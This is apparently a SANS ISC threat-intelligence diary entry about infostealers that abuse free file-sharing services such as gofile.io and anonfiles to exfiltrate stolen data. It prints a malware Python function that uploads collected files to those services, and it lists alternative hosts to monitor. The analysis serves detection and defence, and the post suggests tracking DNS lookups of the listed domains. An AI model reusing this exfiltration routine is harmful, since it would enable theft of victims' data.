Online Services Again Abused to Exfiltrate Data

    Published: 2025-04-15. Last Updated: 2025-04-15 06:08:15 UTC
    by Xavier Mertens (Version: 1)
    0 comment(s)

    If Attackers can abuse free online services, they will do for sure! Why spend time to deploy a C2 infrastructure if you have plenty of ways to use "official" services. Not only, they don't cost any money but the traffic can be hidden in the normal traffic; making them more difficult to detect. A very popular one was anonfiles[.]com. It was so abused that they closed in 2023![1]. A funny fact is that I still see lot of malicious scripts that refer to this domain. Of course, alternatives popped up here and there, like anonfile[.]la[2].

    I spotted some malicious scripts that abuse gofile[.]io[3], mainly infostealers that exfiltrate collected data through this website. The usage is pretty easy: you request an available server and you post your data:

    def UploadToExternalService(self, path, filename=None) -> str | None:
    if os.path.isfile(path):
        Logger.info('Uploading %s to gofile' % (filename or 'file'))
    with open(path, 'rb') as file:
        fileBytes = file.read()
    if filename is None:
        filename = os.path.basename(path)
    http = PoolManager(cert_reqs='CERT_NONE')
    try:
        server = json.loads(http.request('GET', 'https://api[.]gofile[.]io/getServer').data.decode(errors='ignore'))['data']['server']
        if server:
            url = json.loads(http.request('POST', 'https://{}[.]gofile[.]io/uploadFile'.format(server), fields={'file': (filename,     
                             fileBytes)}).data.decode(errors='ignore'))['data']['downloadPage']
            if url:
                return url
    except Exception:
        try:
            Logger.error('Failed to upload to gofile, trying to upload to anonfiles')
            url = json.loads(http.request('POST', 'https://api[.]anonfiles[.]com/upload', fields={'file': (filename, 
                             fileBytes)}).data.decode(errors='ignore'))['data']['file']['url']['short']
            return url
        except Exception:
            Logger.error('Failed to upload to anonfiles')
            return None

    Note that if the upload to gofile.io failed, they will fallback to anonfiles.com!? Just why? The service is down...

    There are many alternatives to these services. Here is a quick list:

    • transfer[.]sh

    • www[.]file[.]io

    • bayfiles[.]com

    • catbox[.]moe

    • filebin[.]net

    • temp[.]sh

    Usually, not used in corporate environments, it could be interesting to track hosts that try to resolve these domains!

    [1] https://www.bleepingcomputer.com/news/security/file-sharing-site-anonfiles-shuts-down-due-to-overwhelming-abuse/
    [2] https://www.anonfile.la/
    [3] https://gofile.io/home

    Xavier Mertens (@xme)
    Xameco
    Senior ISC Handler - Freelance Cyber Security Consultant
    PGP Key

    Keywords: API File Infostealer Online Service Sharing Upload
    0 comment(s)
    ISC Stormcast For Tuesday, April 15th, 2025 https://isc.sans.edu/podcastdetail/9408

      Comments

      Login here to join the discussion.


      Diary Archives